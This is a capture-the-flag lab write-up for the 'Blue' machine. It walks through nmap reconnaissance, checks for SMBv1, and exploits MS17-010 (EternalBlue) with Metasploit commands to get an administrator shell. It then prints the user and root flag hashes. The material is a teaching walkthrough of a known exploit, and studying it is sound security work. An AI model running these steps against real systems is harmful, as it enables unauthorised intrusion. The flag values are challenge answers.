Blue

TARGET IP: 10.10.10.40

HOST IP: 10.10.16.10

RECON

NMAP

nmap [Target IP]

nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]

• Looks like we have SMB open and some RPC open on other ports as well.

• Based on the name alone, I'm highly suspicious that this thing is susceptible to eternal blue. I'm going to use an Nmap scan I found in a previous lab to check.

nmap -p 445 --script smb-protocols {TARGET IP]

• Based on the fact that it allows for SMBv1 and it is running Windows 7, I'm fairly confident that we could probably get Eternal Blue to run.

Exploit

Eternal Blue

msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options

• Use the set command to set the different options.

set rhosts [Target IP]
set lhost [Host IP]

• Now let's check to see if the host is vulnerable before moving forward.

check

• Looks favorable. Let's exploit.

exploit

• Let's start a command prompt shell and verify who we are.

shell
whoami

• And now I have administrator privileges on the machine. Wow that was easy. Let's go grab the flags.

type C:\Users\haris\Desktop\user.txt

9ba10e548f8c18db7f90a5d1c5e2abc4

type C:\Users\Administrator\Desktop\root.txt

77a3bb72c76512c79b243e5235c38958

Conclusion

• This was really easy and I had a feeling it was going to be really easy. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an eternal blue exploit.

• I skipped a LOT of steps in the process that I normally would not have but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case scenario it doesn't work and I go back to my usual process of Recon and Enumeration to discover other methods.

• Having done a coupe of other labs with Eternal Blue, I already knew how to exploit this machine so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power in a system. Good job on creating an awesome tool NSA agents.